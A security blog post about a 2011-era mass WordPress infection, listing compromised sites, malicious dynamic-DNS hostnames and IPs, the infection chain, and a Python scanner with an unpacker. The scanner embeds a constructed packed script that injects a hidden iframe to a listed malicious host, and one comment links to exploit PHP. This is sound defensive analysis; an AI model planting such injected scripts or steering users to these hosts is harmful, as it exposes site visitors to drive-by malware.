Mass WordPress infection ongoing--most malicious domains using changeip.com

(credits: Wayne Huang, Chris Hsiao, NightCola Lin)
(
To peer researchers: As we all know, researching security incidents takes a lot of time and sacrifice; as if they knew exactly how to make our lives harder, attackers often launch right before a weekend or a long vacation. When that happens, we often have to give up personal plans with our families in order to research and publish the threat fast enough.

In the past, soon after we publish a post and tweet the link, other security blogs have quickly put out posts on the same incident. Usually they link to our original post, and we appreciate that very much.

Recently, however, the contents of some of our posts have been copied outright, with no credit or link back to us. We sincerely hope this won't happen again.

Together as a security community, we have a common goal--to make the Internet a safer place for everyone. It's an honor to be a part of this community, and we have a lot of respect for everyone involved. We just don't like the feeling of being taken advantage of. Thanks very much everyone!
)

We've been tracking an ongoing mass WordPress infection that began around Oct 5th, as detected by our HackAlert Website monitoring service. Many WordPress sites have been hit. Using technologyadvances.net as an example, we've created a video showing how an affected WordPress site infects its visitors.


[Summary]
1. Location of injected script: the index page of the compromised website.
2. Means of compromise: we believe a combination of a) stolen WordPress passwords, b) backdoors left in previously compromised WordPress websites, and c) automated script-injection tools that work with either (a) or (b).
3. Injected script: the [Details] section includes an example of an injected script. There are more than 20 variations.
4. Script packer used: Dean Edwards' packer.
5. Malware: multiple malware binaries are installed (dropped) onto visitors' machines without their knowledge. The antivirus detection rate is around 5 out of 43 vendors on VirusTotal at the time of this writing.
6. Infected websites: a lot of WordPress websites have been hit; a sample list follows:

http://technologyadvances.net/
http://dacwada.com/
http://gadgetgad.com/
http://atozdogbreed.com/
http://goaonwheels.com/
http://uprofitpro.com/
http://fitnorama.com/
http://wpsupportdesk.com/
http://positivelypowerful.com/
http://mybravetruehero.com/
http://heavingdeadcats.com/
http://pakprwire.com/
http://browndoggadgets.com/
http://ozfoodtrainer.com/
http://batangyagit.com/
http://bellamediterranean.com/
http://michaelbang.com/
http://kharlota.com/
http://prendilo.com/
http://bilgizah.com/
http://rapidshareleaks.com/
http://girlsonandroid.com/
http://keyhousemedia.com/
http://ryan-key.com/
http://theme-wordpress.com/
http://bx-design.com/
http://the396.com/
http://riverstreetsavannah.com/
http://jardin-jms.com/
http://civitanews.it/
http://capture-the-light.de/
http://spio.it/
http://smfbd.org/
http://utopianwebstrategy.com.au/
http://techmoes.com/
http://24print.lv/
http://vancsa.com/
http://hsncweb.org/
http://anyabarat.hu/
http://creativevisions.org/
http://znews24.com/
http://insidegames.ch/
http://pujckainfo.cz/
http://hdmovies.ro/
http://facilefinanza.it/
http://eflomi.de/
http://lavorareonline.org/
http://shamanicseduction.net/
http://zhutoo.com/
http://fvrc.ru/
http://amazingresorts.co.uk/
http://fotoskaufen.de/
http://vus.de/
http://pohodaveskole.net/
http://geekyfaust.info/
http://tblt.de/
http://internetbusinessuniversity.net/
http://www.paypal-deals.nl/
http://athletics.midsouthcc.edu/
http://blog.asolorep.org/
http://www.nc-council.org/
http://www.paypal-nederland.nl/
http://www.paypal-promo.nl/
http://www.midsouthcc.edu/finaid/
http://www.steinway-gallery.com.sg/

7. Malicious domains: this time, instead of registering the malicious domains themselves, the attackers are mostly using hostnames under the dynamic DNS service provided by changeip.com. A sample list follows:

http://qwqe.dnset.com/showthread.php?t=72241732
http://fadfgsa.toh.info/showthread.php?t=72241732
http://fdfsd.ftp1.biz/showthread.php?t=72241732
http://gsdgs.ftp1.biz/showthread.php?t=72241732
http://fdsfad.4dq.com/showthread.php?t=72241732
http://qwqewqr.ce.ms/showthread.php?t=72241732
http://vxzdbgvsx.ce.ms/showthread.php?t=72241732
http://vgfsgfd.ns02.us/showthread.php?t=72241732
http://fdsfgs.qpoe.com/showthread.php?t=72241732
http://fdafdas.jkub.com/showthread.php?t=72241732
http://vfsgdf.ce.ms/showthread.php?t=72241732
http://fdafad.ce.ms/showthread.php?t=72241732
http://fdafdas.ce.ms/showthread.php?t=72241732
http://fdasfad.ce.ms/showthread.php?t=72241732
http://ghdhgdf.gr8name.biz/showthread.php?t=72241732
http://fadsvzx.3-a.net/showthread.php?t=72241732
http://fdhd.2waky.com/showthread.php?t=72241732
http://gsdgs.ddns.info/showthread.php?t=72241732
http://fdafad.dns04.com/showthread.php?t=72241732
http://fadfda.epac.to/showthread.php?t=72241732
http://fadfa.isasecret.com/showthread.php?t=72241732
http://fdafda.itemdb.com/showthread.php?t=72241732
http://fzxvz.ninth.biz/showthread.php?t=72241732
http://gsfgs.dns-stuff.com/showthread.php?t=72241732
http://fdafd.dns-dns.com/showthread.php?t=72241732
http://fdafda.dynssl.com/showthread.php?t=72291731
http://wqwwer.ce.ms/showthread.php?t=72291731
http://vandamm.345.pl/iframe.php?id=2b8325qvzjut0iv8b87u9nlxnan0kpc

8. Hosting IPs: although all of the above hostnames resolve through changeip.com, only a few IPs have been used so far, including the following:

1. 95.163.66.209 (Primary IP, AS12695, Russian Federation Moscow Digital Networks Cjsc)
2. 64.131.75.19 (AS25847, United States New York Smv)
3. 182.18.185.82 (AS18229, India Hyderabad IP Pool For Znet)

9. Exploit pack: *NOT* Blackhole; still under analysis.

10. Is your WordPress infected? A very simple check is to search your site's pages (the index page in particular) for the following strings: a) showthread b) 72241732 c) 72291731. If any of them is present, have a closer look. You can also use the HackAlert Website monitoring service to have your site monitored 24x7.

[Details]

The infection has a simple chain:

1. The index page of a WordPress site is injected with a script packed by Dean Edwards' packer.
2. The JavaScript generates an iframe pointing to a malicious hostname under changeip.com's dynamic DNS.
3. The browser loads the exploit pack from that hostname, which resolves to one of a few fixed IPs: 95.163.66.209 (Russia), 64.131.75.19 (USA), or 182.18.185.82 (India).

Below is an example of an injected script:

Depending on the victim's browser platform, several malicious binaries are dropped upon successful exploitation. At the time of this writing, the antivirus detection rate is 5 out of 43 vendors on VirusTotal.
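As an added example (not code from the original post or from the HackAlert service), here is a Python scanner that applies the check from item 10 of the summary and follows the chain described above: it walks a WordPress document root for the indicator strings and, where it finds a script packed with Dean Edwards' packer, unpacks it offline to expose the iframe target. The infected index page it ships with is constructed for the demo, using one of the changeip.com hostnames from the list above; it is not a capture of the real injected script, which this post does not reproduce.

```python
"""Scan a WordPress install for the indicators described in this post and
unpack Dean Edwards-packed JavaScript to expose the hidden iframe.
The infected page below is constructed for the demo; it is not a capture."""
import re
import sys
from pathlib import Path

# Strings from item 10 of the summary: the iframe path and the two thread IDs.
INDICATORS = ("showthread", "72241732", "72291731")

# The packer's bootstrap always starts like this ...
PACKER_HEADER = "eval(function(p,a,c,k,e,"
# ... and always ends by calling itself with (payload, radix, count, keywords).
PACKER_ARGS_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)"
)
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Constructed sample of an infected index page.  The packed body writes a
# 1x1 hidden iframe to one of the changeip.com hostnames listed in the post.
SAMPLE_INFECTED_INDEX = r"""<html><body><h1>My blog</h1>
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.2(\'<3 4="5://6.7.8/9.a?t=b" c="1" d="1" e="f:g"></3>\');',62,17,'document||write|iframe|src|http|fdsfgs|qpoe|com|showthread|php|72241732|width|height|style|visibility|hidden'.split('|'),0,{}))</script>
</body></html>"""


def _encode(n: int, radix: int) -> str:
    """Keyword index -> token, exactly as the packer's encode function does it
    (alphabet 0-9a-zA-Z, so radix up to 62 is supported here)."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    out = ""
    while True:
        out = digits[n % radix] + out
        n //= radix
        if n == 0:
            return out


def _js_unescape(s: str) -> str:
    """Undo the two escapes the packer emits inside its single-quoted strings."""
    return re.sub(r"\\(['\\])", r"\1", s)


def unpack(text: str) -> list[str]:
    """Return the decoded payload of every packed block found in text.
    Mirrors the bootstrap: walk the keyword list from the end and replace each
    whole-word token with its keyword.  An empty keyword means the token was
    already its own encoding and is left alone."""
    if PACKER_HEADER not in text:
        return []
    results = []
    for m in PACKER_ARGS_RE.finditer(text):
        payload, radix, count, keywords = m.groups()
        radix, count = int(radix), int(count)
        if radix > 62:
            continue  # the packer's "High ASCII" mode is not handled here
        p = _js_unescape(payload)
        k = _js_unescape(keywords).split("|")
        for c in range(min(count, len(k)) - 1, -1, -1):
            if k[c]:
                token = re.compile(r"\b" + re.escape(_encode(c, radix)) + r"\b")
                p = token.sub(lambda _m, w=k[c]: w, p)
        results.append(p)
    return results


def find_indicators(text: str) -> list[str]:
    """Literal checks from item 10.  The packer stores its keyword dictionary
    in clear text, so these match even inside a still-packed script."""
    return [s for s in INDICATORS if s in text]


def extract_urls(js: str) -> list[str]:
    """Pull the iframe/src targets out of decoded JavaScript."""
    return URL_RE.findall(js)


def scan_tree(root: str, exts=(".php", ".html", ".htm", ".js")) -> dict:
    """Walk a WordPress document root and report files that carry indicators
    or a packed script, together with the URLs the packed script points to."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in exts:
            continue
        text = path.read_text(errors="replace")
        found = find_indicators(text)
        decoded = unpack(text)
        if found or decoded:
            urls = [u for js in decoded for u in extract_urls(js)]
            hits[str(path)] = {"indicators": found, "iframe_urls": urls}
    return hits


if __name__ == "__main__":
    if len(sys.argv) == 2:
        for f, info in scan_tree(sys.argv[1]).items():
            print(f, info)
    else:
        # No document root given: run against the constructed sample page.
        for js in unpack(SAMPLE_INFECTED_INDEX):
            print("decoded:", js)
            print("targets:", extract_urls(js))
```

Run it as `python wp_ioc_scan.py /var/www/html` to report every PHP/HTML/JS file that carries one of the indicator strings or a packed script, along with the URLs the decoded script points to. The unpacker needs no JavaScript engine: it repeats the bootstrap's own loop (walk the keyword list backwards, replace whole-word tokens), and because the packer leaves the keyword dictionary in clear text after the payload, the plain string search from item 10 already matches `showthread` and the thread ID inside the packed script.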

6 comments:

Julien said...

You have saved my life, guy!!!

Scumlabs said...

How do we fix it?..

GaiaLogic said...

While it's fantastic that I now know what it is and what it does, how about telling us all how to locate and remove it? I see a lot of people out there talking about this, but no one seems to be able to tell us noobs how to deal with it.
This is why these things continue to happen on a massive scale: it takes us months to find an effective solution because all the people discussing it either think we all should know how to deal with it or just can't be bothered to explain it!
Tell people how to fix these things, and maybe we wouldn't be seeing all of this.

Then again, maybe it serves some that millions of people don't know?

Andrew said...

This exploit's php contents are here: http://pastebin.com/3aqLniZN
They seem to like to use timthumb.php as a method for injecting their code (most likely other known exploits as well), so make sure you have the newest version of that file as well as all the security updates installed!

JF Agno said...

I'm one of the infected sites in the list, but I think I have removed it. How should I know if I'm still infected?

viagra said...

Nice information, I really appreciate the way you presented it. Thanks for sharing.
